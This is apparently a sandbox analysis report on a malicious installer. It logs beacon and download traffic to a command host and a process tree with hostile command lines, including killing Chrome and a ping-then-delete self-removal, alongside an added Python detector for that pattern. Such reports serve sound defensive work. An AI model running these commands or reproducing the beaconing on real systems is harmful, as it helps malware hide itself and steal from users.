                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2d648e00004c61b1994000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5g3aT8lPdnyB9jWTP95RAHw3oVLgY0%2FefvjSXjXBUyovDBRJ9Q3Die9iIyPy%2FChjRvyWHpSsLt1UJx8R4dWOiGsKPHsfV%2BmTfbNziSsQjbO5lspcOg%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 6192181a78384c61-AMS
                                                                                                                                              Data Raw: 63 0d 0a 36 6d 74 6e 56 58 47 68 64 31 30 7e 0d 0a
                                                                                                                                              Data Ascii: c6mtnVXGhd10~
                                                                                                                                              Jan 29, 2021 10:58:21.875001907 CET553INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:58:38.902834892 CET3799OUTPOST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 81
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:58:38.903032064 CET3799OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 58 6b 67 75 2d 4e 34 42 32 77 30 66 34 32 45 52 50 5f 5a 69 33 73 7e
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwXkgu-N4B2w0f42ERP_Zi3s~
                                                                                                                                              Jan 29, 2021 10:58:43.088757992 CET3832INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:43 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d1aaaf676400195897aaa736e68af83f21611914318; expires=Sun, 28-Feb-21 09:58:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2dac5a00004c6173a71000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QrxBTgh5VEY%2FyGwRm8fpiyDQ81F2cxVikTSbfZfsykDUviDGGgLteM%2F8HUETV05NxuSf1nF8aNR0NFZKJ4Ga7NlJMW4%2B7imeiHhsjOJaek5leRucVw%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 6192188d5b224c61-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49731 | 104.21.23.16 | 80 | C:\Users\user\Desktop\FileSetup-v17.04.41.exe
Timestamp | kBytes transferred | Direction | Data
Jan 29, 2021 10:57:54.991064072 CET | 165 | OUT | POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 84cfba021a5a6662.xyz
Jan 29, 2021 10:57:54.991079092 CET | 165 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 59 6b 57 34 56 30 67 78 67 4b 50 55 77 46 67 67 56 54 68 63 4f 77 7e
Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwYkW4V0gxgKPUwFggVThcOw~
Jan 29, 2021 10:58:01.071065903 CET | 177 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Jan 2021 09:58:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d659721ae455bd28df3ec85a0cc24d51b1611914275; expires=Sun, 28-Feb-21 09:57:55 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 07ef2d00d400000c5914242000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TpOS8Oh%2BIfFIoHULqy0q7tns03UI6bzsBXB0xtB%2F%2BUvWonpEJjh%2BmDyel%2FTtgaQLKiog0IGDTP7DzciECfBpWQ4q2tyZ8vvCkWJ6%2Fm%2BAJE2W%2F2xwWA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 6192177ae8c90c59-AMS
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Jan 29, 2021 10:58:02.347929001 CET | 178 | OUT | POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 84cfba021a5a6662.xyz
Jan 29, 2021 10:58:02.348011971 CET | 178 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 59 6b 57 34 56 30 67 78 67 4b 50 46 37 75 66 38 34 70 42 66 41 73 7e
Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwYkW4V0gxgKPF7uf84pBfAs~
Jan 29, 2021 10:58:06.584638119 CET | 275 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Jan 2021 09:58:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dde40bd026db3966b50373a262ab1e7e31611914282; expires=Sun, 28-Feb-21 09:58:02 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 07ef2d1d9000000c5964a2d000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VfUJUQAXbOYJ7xeUF3m7aF41AINHGvqVnN1%2BIUEEShaZVESyVRsO3gey5j7pMkM7h83jvpm6icHicoghEgvt9K3zpai7twAWwglI5pniXECO4rLnhg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 619217a8ed820c59-AMS
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49746 | 104.21.23.16 | 80 | C:\Users\user\Desktop\FileSetup-v17.04.41.exe
Timestamp | kBytes transferred | Direction | Data
Jan 29, 2021 10:58:49.195518970 CET | 3833 | OUT | GET /info_old/ddd HTTP/1.1
Host: 84CFBA021A5A6662.xyz
Accept: */*
Jan 29, 2021 10:58:50.595266104 CET | 3833 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Jan 2021 09:58:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dabf74ae152e8f8c1cc86144a064149311611914329; expires=Sun, 28-Feb-21 09:58:49 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 07ef2dd49100004c198d951000000001
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sUvK9u52Uqh5fM8i2xQjCaaxXNAAXk4CsI2tr8kCKcuvvL%2BN5pOlrWkqr0nXqkSf6nODDrWpjbcJ0XWZdPGzVGCgqyW0rzbgHqx8eZfvFOrakdeBhA%3D%3D"}],"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 619218cdb8eb4c19-AMS
Data Raw: 63 0d 0a 34 48 41 6f 5a 6c 35 47 46 54 63 7e 0d 0a
Data Ascii: c4HAoZl5GFTc~
Jan 29, 2021 10:58:50.595309019 CET | 3834 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time: 10:57:34
Start date: 29/01/2021
Path: C:\Users\user\Desktop\FileSetup-v17.04.41.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\FileSetup-v17.04.41.exe'
Imagebase: 0x400000
File size: 4592400 bytes
MD5 hash: B7234E4A9AAAACEFA890535F8117C8FC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000001.00000002.261933148.00000000028E0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                              Reputation:low

                                                                                                                                              General

                                                                                                                                              Start time:10:57:38
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
                                                                                                                                              Imagebase:0xc0000
                                                                                                                                              File size:59904 bytes
                                                                                                                                              MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:10:57:40
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E90BF9A81DF75408BCAEC738866B933F C
                                                                                                                                              Imagebase:0xc0000
                                                                                                                                              File size:59904 bytes
                                                                                                                                              MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:10:57:44
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 0011 installp3
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:4592400 bytes
                                                                                                                                              MD5 hash:B7234E4A9AAAACEFA890535F8117C8FC
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.385937201.00000000027D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                              • Detection: 48%, ReversingLabs
                                                                                                                                              Reputation:low

                                                                                                                                              General

                                                                                                                                              Start time:10:57:45
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 200 installp3
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:4592400 bytes
                                                                                                                                              MD5 hash:B7234E4A9AAAACEFA890535F8117C8FC
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000005.00000002.290296269.0000000002810000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                              Reputation:low

                                                                                                                                              General

                                                                                                                                              Start time:10:57:50
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\FileSetup-v17.04.41.exe'
                                                                                                                                              Imagebase:0x9e0000
                                                                                                                                              File size:232960 bytes
                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:10:57:52
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                                                              File size:625664 bytes
                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:10:57:53
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:ping 127.0.0.1 -n 3
                                                                                                                                              Imagebase:0x940000
                                                                                                                                              File size:18944 bytes
                                                                                                                                              MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate

                                                                                                                                              General

                                                                                                                                              Start time:10:57:58
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Users\user\AppData\Roaming\1611946678493.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:'C:\Users\user\AppData\Roaming\1611946678493.exe' /sjson 'C:\Users\user\AppData\Roaming\1611946678493.txt'
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:103632 bytes
                                                                                                                                              MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low

                                                                                                                                              General

                                                                                                                                              Start time:10:58:00
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                              Imagebase:0xb90000
                                                                                                                                              File size:232960 bytes
                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:10:58:01
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                                                              File size:625664 bytes
                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:10:58:01
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:taskkill /f /im chrome.exe
                                                                                                                                              Imagebase:0x10d0000
                                                                                                                                              File size:74752 bytes
                                                                                                                                              MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Start time:10:58:06
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe'
                                                                                                                                              Imagebase:0x11c0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:58:06
Start date: 29/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:58:07
Start date: 29/01/2021
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 3
Imagebase: 0x3b0000
File size: 18944 bytes
MD5 hash: 70C24A306F768936563ABDADB9CA9108
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:58:43
Start date: 29/01/2021
Path: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Imagebase: 0xbf0000
File size: 73160 bytes
MD5 hash: F0372FF8A6148498B19E04203DBB9E69
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, Metadefender
• Detection: 2%, ReversingLabs

General

Start time: 10:58:51
Start date: 29/01/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe'
Imagebase: 0x11c0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:58:51
Start date: 29/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:58:51
Start date: 29/01/2021
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 3
Imagebase: 0x3b0000
File size: 18944 bytes
MD5 hash: 70C24A306F768936563ABDADB9CA9108
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
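The cmd.exe entry above shows the dropper's clean-up: the loopback ping is not a network check but a delay of roughly three seconds that lets the parent exit before the `del` removes its image. The following is an added detection example, not part of the sandbox report or the sample: it scans process-creation records of the form (parent image, child command line) and flags a cmd.exe child that chains a ping to a `del` of an executable. The `SAMPLE_EVENTS` records are constructed for this example; only the first one copies the report's command line, and the parent image it pairs with it is an assumption.

```python
"""Flag the "ping, then del" self-removal pattern seen in the process list."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed (parent image path, child command line) records; the first command
# line is the one from the report, the rest are made up for this example.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe",
     r"cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe'"),
    (r"C:\Windows\explorer.exe",
     r'cmd.exe /c ping -n 10 localhost > nul && del /f /q "C:\ProgramData\svc\updater.exe"'),
    (r"C:\Windows\System32\cmd.exe", "ping 127.0.0.1 -n 3"),       # the ping child on its own
    (r"C:\Windows\explorer.exe", "cmd /c ping 10.0.0.5 -n 4"),      # a genuine reachability check
    (r"C:\Windows\explorer.exe", r"cmd /c del C:\Temp\old.log"),     # a delete without the delay
]

LOOPBACK = {"127.0.0.1", "localhost", "::1"}
DROPPER_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js")

# "ping <args>" followed by a cmd separator (& or &&) and "del <args>"
PING_THEN_DEL = re.compile(
    r"\bping(?:\.exe)?\b(?P<ping>[^&|]*)&{1,2}\s*del\b(?P<del>[^&|]*)", re.IGNORECASE
)

@dataclass
class Finding:
    host: str
    count: int          # -n value, i.e. roughly the number of seconds slept
    target: str         # file passed to del
    loopback: bool      # ping target is the local host, so the ping is only a delay
    self_delete: bool   # the deleted file is the parent's own image

def _ping_host_and_count(segment: str) -> Tuple[Optional[str], Optional[int]]:
    """Pull the host and the -n count out of the ping argument list, in any order."""
    host, count = None, None
    toks = segment.split()
    i = 0
    while i < len(toks):
        t = toks[i]
        if t.lower() == "-n" and i + 1 < len(toks) and toks[i + 1].isdigit():
            count = int(toks[i + 1])
            i += 2
            continue
        if t.lower() in ("-w", "-l", "-i") and i + 1 < len(toks):   # switches taking a value
            i += 2
            continue
        if t.startswith(("-", "/", ">", "<")) or t.lower() == "nul":  # other switches, redirects
            i += 1
            continue
        host = host or t
        i += 1
    return host, count

def _del_target(segment: str) -> str:
    """Strip del's switches (/f /q /s /a) and surrounding quotes from the path."""
    toks = [t for t in segment.split() if not t.startswith("/")]
    return " ".join(toks).strip("'\"")

def detect(parent_image: str, cmdline: str) -> Optional[Finding]:
    m = PING_THEN_DEL.search(cmdline)
    if not m:
        return None
    host, count = _ping_host_and_count(m.group("ping"))
    target = _del_target(m.group("del"))
    if not target.lower().endswith(DROPPER_EXT):
        return None   # deleting a log or data file is not the dropper clean-up pattern
    return Finding(host=host or "?", count=count or 0, target=target,
                   loopback=(host or "").lower() in LOOPBACK,
                   self_delete=target.lower() == parent_image.lower())

def scan(events: List[Tuple[str, str]]) -> List[Finding]:
    findings = []
    for parent, cmd in events:
        f = detect(parent, cmd)
        if f is not None:
            findings.append(f)
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f)
```

Run against the constructed records, only the two ping-then-del lines are reported; the stand-alone `ping 127.0.0.1 -n 3` child is not, since on its own it is indistinguishable from a legitimate ping. Pairing the `del` target with the parent image is what turns the generic "ping used as sleep" signal into the stronger "process deletes its own binary" one.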

Disassembly

Code Analysis

Executed Functions

APIs
• CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00495E7B
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00495EB2
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00495EEB
• FindCloseChangeNotification.KERNELBASE(?), ref: 00495F04
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00495F41
Memory Dump Source
• Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: AllocFileVirtual$ChangeCloseCreateFindNotificationRead
• String ID: CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect$c$e$o$r$s$s
• API String ID: 1686837766-3752642194
• Opcode ID: 88b03a9a21f863f14479d1feee9f3f23c5a00ba75dbac96dfa7e331bc54643ba
• Instruction ID: 26af8576340048de3430999a72b18f42400ff8df4d6d9490f9c2f0f16d1812bf
• Opcode Fuzzy Hash: 88b03a9a21f863f14479d1feee9f3f23c5a00ba75dbac96dfa7e331bc54643ba
• Instruction Fuzzy Hash: 6481A9B1D00228AFDB61DB64CC55BDEBBB8AF49704F0081D9E60DB6281DB755B84CF60
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 00496A0E
Memory Dump Source
• Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: ProtectVirtual
• String ID: $@
• API String ID: 544645111-1077428164
• Opcode ID: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
• Instruction ID: 3a130887b8ca1edc836106803fa62228ec3ea30709df9660be58108d9c7dddee
• Opcode Fuzzy Hash: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
• Instruction Fuzzy Hash: 855108B4A00219DFDB08CF88D590BADBBF2FF88314F158259E406AB394D735A985CF94
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
• Instruction ID: 11b50270cd810076d1eb4b439b85e9b0697e071d7fc060bdc4a274b747103f56
• Opcode Fuzzy Hash: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
